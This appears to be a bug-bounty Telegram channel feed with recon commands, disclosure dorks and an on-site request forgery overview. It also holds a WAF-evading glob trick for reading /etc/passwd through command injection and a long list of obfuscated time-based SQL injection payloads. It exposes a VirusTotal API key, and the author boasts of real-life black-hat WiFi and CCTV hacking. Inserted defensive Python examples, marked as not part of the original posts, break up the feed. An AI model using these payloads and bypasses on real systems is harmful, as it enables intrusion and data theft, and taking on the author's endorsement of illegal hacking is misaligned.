haxshadow
This channel is all about bug hunting, cybersecurity and ethical hacking related content.
any query msg me at @haxshadow_bot
Youtube:https://youtube.com/@haxshadow7
If you want to support ;)
Live Bug Bounty Hunting: The Ultimate Checklist to Level Up Your Skills | Bugcrowd | part-(1)
https://youtu.be/2nYDs_yDCXI?si=mjZRs5eNVIUhs0tO
🔖 On-Site Request Forgery (OSRF): An Overview

🚨On-Site Request Forgery (OSRF) is a lesser-known but impactful vulnerability similar to Cross-Site Request Forgery (CSRF). While both involve unauthorized actions performed on behalf of an authenticated user, the fundamental distinction lies in the request origin.  

- CSRF: The attacker initiates requests from their controlled domain to exploit a victim's authenticated session.  
- OSRF: The requests originate from the vulnerable application itself, and the attacker controls where the requests are directed.  

---

🔍 Where to Find OSRF Vulnerabilities  

1. Reflected Inputs in src Attributes  
   Look for inputs that can be reflected in attributes like src. Example vulnerable tags:  

   ```html
   <img src="OUR_INPUT_HERE">
   <video width="400" height="200" controls src="OUR_INPUT_HERE">
   <audio src="OUR_INPUT_HERE">
   <iframe src="OUR_INPUT_HERE">
   ```


👉 If the input can be manipulated, it may allow the attacker to direct requests to their desired endpoints.

2. Sensitive Endpoints Using the GET Method  
   Endpoints performing sensitive actions with GET requests are prime targets for OSRF. For example:  

   ```http
   GET /settings.php?remove_account=1
   Host: example.com
   User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
   ```

   If such endpoints exist and can be reached through a reflected src value, they can be exploited for OSRF.

⚠️ Best Practices for Prevention  
1. Avoid GET Methods for Sensitive Actions  
   Use POST for actions that change state: a browser never issues a POST from a simple resource load such as an img or iframe src, so a reflected URL cannot trigger the action on its own.  

2. Validate and Sanitize Inputs  
   Ensure all user inputs, especially those reflected in attributes like src, are properly validated and sanitized.  

3. Implement Content Security Policies (CSP)  
   CSPs can limit where resources like images or iframes can be loaded from, reducing the risk of external request manipulation.  

4. Monitor and Audit Application Behavior  
   Regularly test your application for unusual or unintended request behaviors to identify vulnerabilities early.  

This additional layer of security awareness helps ensure OSRF vulnerabilities are addressed alongside CSRF for a more robust application defense.
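The two sides of the fix described above, as an added example that is not part of the original post: a template helper that reflects input straight into src (the vulnerable pattern), beside a hardened version that allowlists the origin and attribute-escapes the value. The allowlist entry `cdn.example.com` and the fallback path are assumptions constructed for the example.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

# Constructed allowlist of origins the application is willing to embed
# resources from (assumption; a real deployment would load this from config).
ALLOWED_ORIGINS = {("https", "cdn.example.com")}


def render_img_vulnerable(user_input: str) -> str:
    """'Before': the reflected value is dropped straight into src, so the
    victim's browser issues whatever request the attacker chose, from the
    application's own origin and with the victim's session cookies."""
    return f'<img src="{user_input}">'


def safe_src(user_input: str) -> Optional[str]:
    """Accept only absolute https URLs on an allowlisted origin.
    Relative paths such as /settings.php?remove_account=1 (the OSRF case),
    other schemes, and userinfo tricks like https://cdn.example.com@evil.test/
    all fail because (scheme, netloc) must match the allowlist exactly."""
    parts = urlsplit(user_input.strip())
    if (parts.scheme.lower(), parts.netloc.lower()) not in ALLOWED_ORIGINS:
        return None
    return parts.geturl()


def render_img_hardened(user_input: str,
                        fallback: str = "/static/placeholder.png") -> str:
    """'After': validate first, then attribute-escape so the value can never
    break out of the quoted src attribute."""
    src = safe_src(user_input) or fallback
    return f'<img src="{html.escape(src, quote=True)}">'


if __name__ == "__main__":
    for value in ["/settings.php?remove_account=1",
                  "https://cdn.example.com/logo.png",
                  "https://cdn.example.com@evil.test/x.png"]:
        print(render_img_vulnerable(value), "->", render_img_hardened(value))
```

Note that a CSP such as `img-src 'self' https://cdn.example.com` blocks the embedded resource from loading from third-party hosts but does not stop the same-origin OSRF case, since `/settings.php?remove_account=1` is `'self'`; the allowlist check above and moving the action to POST are what close that path.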

Learn More:
https://github.com/daffainfo/AllAboutBugBounty/blob/master/On%20Site%20Request%20Forgery.md
subdomainRecon.txt
3.1 KB
I have given this file because many of my subscribers requested it. However, I would like to make one request to you: please share my YouTube channel and Telegram channel more.
Scan for WordPress, Joomla, Drupal and Moodle bugs via CMSmap.
Uncover Hidden Parameters & Spot XSS in One Go
⚡️Bug Bounty Helper
dorks.faisalahmed.me
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original

https://www.virustotal.com/vtapi/v2/domain/report?apikey=982680b1787fa59701919aa22515a025e00df1e3bb2bc4f186b8e919558d576c&domain=example.com

https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1

curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt

cat out.txt | uro |  grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Add the endpoint to your SSRF wordlist
Well, many of you will notice that I have not been posting any videos lately. This is because I have been recharging with black hat hacking for some time now. I am recharging with many things like WiFi hacking 📡 in as many ways as possible, Bluetooth hacking 🚦, CCTV camera hacking 📸, mobile hacking 📱 and many more things that I will use in my real life. But if I feel that I need to bring a video or course on this topic, then I will definitely bring it and let you know my opinion.
☄️Information Disclosure Dork☄️

site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)
A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.

Use shell globbing / wildcard expansion. Here is an example:

cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how?

Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.

/e*c: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."

/p*s*d: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d
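The expansion described above, reproduced from the defender's side as an added example (not code from the original post): a small normalizer that resolves wildcard arguments against a known path inventory the way the shell does before exec, so a WAF or command-audit rule can match on `/etc/passwd` even when the request carried `/e*c/p*s*d`. The path inventory is constructed for the example; it also generalizes beyond the single case in the text by applying the per-component rule (`*` never crosses `/`) to any pattern.

```python
import fnmatch
import re
from typing import List

# Constructed inventory of paths the normalizer knows about (assumption: on a
# real host this would be populated from the filesystem or a file inventory).
KNOWN_PATHS = [
    "/etc/passwd", "/etc/shadow", "/etc/hosts", "/etc/profile",
    "/usr/bin/python3", "/var/log/syslog", "/home/user/notes.txt",
]

GLOB_CHARS = re.compile(r"[*?\[]")


def glob_match(pattern: str, path: str) -> bool:
    """Shell-style pathname match: '*' and '?' match within one path
    component only and never cross a '/' (plain fnmatch would cross it)."""
    pseg, tseg = pattern.split("/"), path.split("/")
    if len(pseg) != len(tseg):
        return False
    return all(fnmatch.fnmatchcase(t, p) for p, t in zip(pseg, tseg))


def expand_glob(pattern: str, paths: List[str] = KNOWN_PATHS) -> List[str]:
    """Return, sorted, every known path the pattern would expand to."""
    return sorted(p for p in paths if glob_match(pattern, p))


def normalize_command(cmd: str, paths: List[str] = KNOWN_PATHS) -> str:
    """Rewrite each wildcard argument as the paths it expands to, the same way
    the shell does before exec; a pattern with no match stays literal (bash's
    default without nullglob/failglob)."""
    out: List[str] = []
    for tok in cmd.split():
        if GLOB_CHARS.search(tok):
            out.extend(expand_glob(tok, paths) or [tok])
        else:
            out.append(tok)
    return " ".join(out)


def is_glob_obfuscated(cmd: str, paths: List[str] = KNOWN_PATHS) -> bool:
    """Heuristic for a WAF or audit log: a wildcard token that resolves to
    exactly one path was almost certainly written to evade a string match,
    whereas a legitimate bulk operation matches several."""
    return any(GLOB_CHARS.search(tok) and len(expand_glob(tok, paths)) == 1
               for tok in cmd.split())


if __name__ == "__main__":
    for cmd in ["cat /e*c/p*s*d", "ls /e*c/*", "cat /nope/*"]:
        print(f"{cmd:18} -> {normalize_command(cmd):45} obfuscated={is_glob_obfuscated(cmd)}")
```

The useful property for detection is that the normalized form, not the raw string, is what gets compared against the blocklist; the single-match heuristic is a cheap extra signal and should be tuned against real traffic before it blocks anything.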

#bugbountytips #hacking
Time-based SQL injection payloads for different DBMSs:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
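A detection-side companion to the list above, added here as an example and not part of the original post: every payload in the list relies on one of three delay primitives (MySQL `sleep()`, PostgreSQL `pg_sleep()`, MSSQL `WAITFOR DELAY`) wrapped in URL encoding, NUL bytes and `/*f*/` comments to dodge naive filters. The checker below canonicalizes a parameter value before matching, so the obfuscation layers do not matter. The sample query strings are constructed for the example.

```python
import re
from typing import List
from urllib.parse import parse_qsl, unquote

# Delay primitives used by the time-based payloads above. \s* lets the
# unspaced "WAITFORDELAY" form match as well as "WAITFOR DELAY".
DELAY_PATTERNS = [
    re.compile(r"\bsleep\s*\(", re.I),
    re.compile(r"\bpg_sleep\s*\(", re.I),
    re.compile(r"\bwaitfor\s*delay\b", re.I),
]


def canonicalize(value: str) -> str:
    """Strip the layers that hide the primitive from a naive filter:
    repeated URL encoding, NUL bytes, '+' as space, and inline comments
    (/*f*/) used in place of whitespace."""
    s = value
    for _ in range(3):                      # bounded multi-decode
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.replace("\x00", "").replace("+", " ")
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return s


def looks_like_time_based_sqli(value: str) -> bool:
    """True when a parameter value contains a DBMS delay call after canonicalization."""
    canon = canonicalize(value)
    return any(p.search(canon) for p in DELAY_PATTERNS)


def flag_params(query_string: str) -> List[str]:
    """Return the names of query parameters whose values look like time-based injection."""
    return [name for name, value in parse_qsl(query_string, keep_blank_values=True)
            if looks_like_time_based_sqli(value)]


# Constructed sample query strings (not real traffic) to run the check over.
SAMPLE_QUERY_STRINGS = [
    "id=1'/*f*/or/*f*/sleep/*f*/(7)--%23&page=2",
    "q=%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23",
    "user=admin'WAITFORDELAY'0:0:7'%23",
    "search=sleeping+beauty&sort=asc",
]

if __name__ == "__main__":
    for qs in SAMPLE_QUERY_STRINGS:
        print(f"{qs!r:55} -> flagged: {flag_params(qs)}")
```

A pattern check like this belongs in logging and alerting, not as the only defence: the fix for the injection itself is parameterized queries, and the timing signature (a response that takes exactly the requested number of seconds) is the other signal worth alerting on.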
☄️IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.

🛍https://github.com/errorfiathck/IDOR-Forge
Hello...🫶🏻
A new video will be uploaded at 6pm.
I have uploaded my new video, I hope everyone will support me.
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\"](https?:)?[/]{1,2}[^'\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\"](https?:)?[/]{1,2}[^'\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu